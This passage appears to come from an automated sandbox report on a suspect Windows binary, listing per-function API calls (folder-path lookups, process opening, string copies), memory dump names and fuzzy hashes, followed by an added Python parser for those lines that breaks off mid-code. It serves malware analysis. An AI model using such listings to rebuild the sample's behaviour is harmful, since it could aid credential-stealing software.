                                • lstrcat.KERNEL32(?,00F1F400), ref: 006DE59C
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: cb116a0f35225e324d08cfba0410d2b24bc5656b8ee0fd36a9934cc606de4c43
                                • Instruction ID: de8c2980f507456cd5538747c3b36b28e96dac380ab2af29731677a415b42869
                                • Opcode Fuzzy Hash: cb116a0f35225e324d08cfba0410d2b24bc5656b8ee0fd36a9934cc606de4c43
                                • Instruction Fuzzy Hash: 0E5193B5A10108AFCB94EBA5DC46EFE337AFB88310F44445DB90997341EE71AE41CBA4
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006E1FDF, 006E1FF5, 006E20B7
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 550a7c58928e28eb344b2189979e9cf4ee1ef3f30e1d7bea0f2d1139b4605c2b
                                • Instruction ID: aa8c0e979b29ff5ec07a168bfe2d21bf502e489149f8f756074c29817e89aeff
                                • Opcode Fuzzy Hash: 550a7c58928e28eb344b2189979e9cf4ee1ef3f30e1d7bea0f2d1139b4605c2b
                                • Instruction Fuzzy Hash: 6E2128355223CA8BD720EA36C8A46EDF36BEF80361F844156C8190B7C1E336194AD796
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DEBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DEBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 006DEBF1
                                • lstrcat.KERNEL32(?,00F20490), ref: 006DEC0C
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: bb108bc305616d4da9a697e2d9aa27276ac9de37de0b38114dd2a543ccda831d
                                • Instruction ID: beff73143fc179b4d1462a2a3aae83748a5bea89cc976891f3d2349361279c5f
                                • Opcode Fuzzy Hash: bb108bc305616d4da9a697e2d9aa27276ac9de37de0b38114dd2a543ccda831d
                                • Instruction Fuzzy Hash: E53160B1A10119ABCB61EBB5DC55FFD77B9FF48300F1004ADBA0A9B241DE70AE448B94
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 006E4492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 006E44AD
                                • CloseHandle.KERNEL32(00000000), ref: 006E44B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E44E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: 2128367cc97818d8e7fd4be57fdc89ff50ae0d0b82f95986045151b57cd70dad
                                • Instruction ID: b08cc54ee997d7b65f6d365637d72c12e3ee4e1ccf48fe5f9771758d53de83bf
                                • Opcode Fuzzy Hash: 2128367cc97818d8e7fd4be57fdc89ff50ae0d0b82f95986045151b57cd70dad
                                • Instruction Fuzzy Hash: C1F0C8B09027556BE721AB759C49FFA76E9FB54304F0005A5EA89D72C0DEB48884CB90
                                APIs
                                • __getptd.LIBCMT ref: 006E8FDD
                                  • Part of subcall function 006E87FF: __amsg_exit.LIBCMT ref: 006E880F
                                • __getptd.LIBCMT ref: 006E8FF4
                                • __amsg_exit.LIBCMT ref: 006E9002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 006E9026
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: c36cf916b753456198ff487efc74eb7d175b6d0116ac778cd66759b7f60c92d9
                                • Instruction ID: 9da9a9c771fea4c494994770f2ad811be4ed553e8adf2f9c03ef3e49dbbd565b
                                • Opcode Fuzzy Hash: c36cf916b753456198ff487efc74eb7d175b6d0116ac778cd66759b7f60c92d9
                                • Instruction Fuzzy Hash: 82F0F63290B7908BDBA0BB7B580675D33A36F10710F24011DF008672D2DF641900D66D
                                APIs
                                • lstrlen.KERNEL32(------,006C5BEB), ref: 006E731B
                                • lstrcpy.KERNEL32(00000000), ref: 006E733F
                                • lstrcat.KERNEL32(?,------), ref: 006E7349
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: 41a5c121786c4f42cc4725dda4effb1eeeca8a7529ad981b3689c01957574bbe
                                • Instruction ID: 38aa4bc6f63d8b3c79fa465a0ff519eb49551db8c53b9878a496ab4d44120a00
                                • Opcode Fuzzy Hash: 41a5c121786c4f42cc4725dda4effb1eeeca8a7529ad981b3689c01957574bbe
                                • Instruction Fuzzy Hash: 9AF0C9785117429FDB649F36D848E26BAFAFF84701318882DACDAC7314EB34D841DB10
                                APIs
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D3422
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D3471
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D3497
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: e91b3958852f5f8686b6a8bd3e3d0e708d6c268e9c73d1bdfaaf659769e6e1e9
                                • Instruction ID: 5c3dc3a0f112c4e9421f6da58e8af900e6292b8cb9241590ef31dd07a3680d75
                                • Opcode Fuzzy Hash: e91b3958852f5f8686b6a8bd3e3d0e708d6c268e9c73d1bdfaaf659769e6e1e9
                                • Instruction Fuzzy Hash: 1612FA70E012218FDB28CF29D554BA5B7E6BF44318B19C0AEE809DB3A2D776DD42CB45
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006D7C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 006D7CAF
                                  • Part of subcall function 006D7D40: std::_Xinvalid_argument.LIBCPMT ref: 006D7D58
                                  • Part of subcall function 006D7D40: std::_Xinvalid_argument.LIBCPMT ref: 006D7D76
                                  • Part of subcall function 006D7D40: std::_Xinvalid_argument.LIBCPMT ref: 006D7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 6c86b11640f4871e82730e736893624e318363f81c51de067453da32c1f7a760
                                • Instruction ID: 7f58cc860a37cf9317dbf428833c568020feef908ceb671a109c59cab0bd99c2
                                • Opcode Fuzzy Hash: 6c86b11640f4871e82730e736893624e318363f81c51de067453da32c1f7a760
                                • Instruction Fuzzy Hash: C73106727182148FD734DE6CE88096AF3EBEF95760B20462FF5418B741E7719C4183AA
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 006C6F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C6F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: dad14d2852598392fdc172ea70fc293ca0fd17270bc7647de13533041220f1cb
                                • Instruction ID: b31005c20d59a6ef3467e94b41f15ca3e7306a2519738e3d0a7b8bcb3b0e6a0c
                                • Opcode Fuzzy Hash: dad14d2852598392fdc172ea70fc293ca0fd17270bc7647de13533041220f1cb
                                • Instruction Fuzzy Hash: 35218CB06006019BEB209F20DC84FB673EAEB80705F44487CF996CBA84FB75E945CB54
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E244C
                                • lstrlen.KERNEL32(00000000), ref: 006E24E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2570
                                • lstrlen.KERNEL32(00000000), ref: 006E2577
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: fe837f4e58cd187e97adc53b948d4b761aa3ad719484f7e6d81d9155ec93cf34
                                • Instruction ID: 2c77bf2b07293638e46a7e3760e97bf2ebc870b985da2022572ea875abd67e41
                                • Opcode Fuzzy Hash: fe837f4e58cd187e97adc53b948d4b761aa3ad719484f7e6d81d9155ec93cf34
                                • Instruction Fuzzy Hash: 0481D1B0E013469BDB14CF96D854BAEB7BBFF84300F18806DE508A7381EB759946CB94
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006E15A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E15D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E1611
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E1649
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 33b6b4456abe4eb46a20b4cc025c439746e378e197851f547a45b433986e4f1f
                                • Instruction ID: 080ded590667b9a2c26b7b919fa72cda9f15c537034715b16053496d5e93ab7e
                                • Opcode Fuzzy Hash: 33b6b4456abe4eb46a20b4cc025c439746e378e197851f547a45b433986e4f1f
                                • Instruction Fuzzy Hash: F321D8B4612B429BD7249F6BD458F67B7E6FF85700B04491CA89ACBB40DB34E841CBA0
                                APIs
                                  • Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000), ref: 006C162D
                                  • Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000,?), ref: 006C164F
                                  • Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000,?), ref: 006C1671
                                  • Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000,?), ref: 006C1693
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 8a64e526a3d252d04f4f2bf2cea257082e6924de4fca062d89ffe83649e8046b
                                • Instruction ID: 33cbe13a2ff1d3565dc81de2478e14064a18e7527673a0cfffd26e6d59da99c5
                                • Opcode Fuzzy Hash: 8a64e526a3d252d04f4f2bf2cea257082e6924de4fca062d89ffe83649e8046b
                                • Instruction Fuzzy Hash: 8E31C7B4A11B429FC764DF3AC554A62B7E5FF8A300740492DE896C7B10DB34F851CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006C162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1671
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1693
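                                 The following Python is an added example, not part of the Joe Sandbox report. It turns the API reference lines and associated dump names of the two entries above into structured data: it separates a function's direct call sites from the sites the report attributes to a subcall (the "Part of subcall function" prefix), and it locates a reference address inside the listed memory regions. The sample lines are copied from the entries above. Reading the fifth dotted field of an .sdmp name as a Win32 PAGE_* protection is an assumption inferred from the values 0x04, 0x40 and 0x80 that appear; the report does not document its naming scheme, and it gives no region sizes, so the lookup assumes the listed regions tile the module.

```python
import re
from collections import defaultdict

# Constructed sample: the API reference lines of the two function entries above
# (direct call sites around 0x6C1557 plus the sites attributed to subcall 0x6C1610).
SAMPLE_API_LINES = """\
• Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000), ref: 006C162D
• Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000,?), ref: 006C164F
• Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000,?), ref: 006C1671
• Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000,?), ref: 006C1693
• lstrcpy.KERNEL32(00000000,?), ref: 006C1557
• lstrcpy.KERNEL32(00000000,?), ref: 006C1579
• lstrcpy.KERNEL32(00000000,?), ref: 006C159B
• lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
"""

# Constructed sample: three of the associated memory dump names listed above.
SAMPLE_DUMPS = [
    "00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp",
]

# One reference line: optional bullet, optional subcall prefix, api.MODULE(args), ref: addr
API_REF = re.compile(
    r"^(?:•\s*)?"
    r"(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
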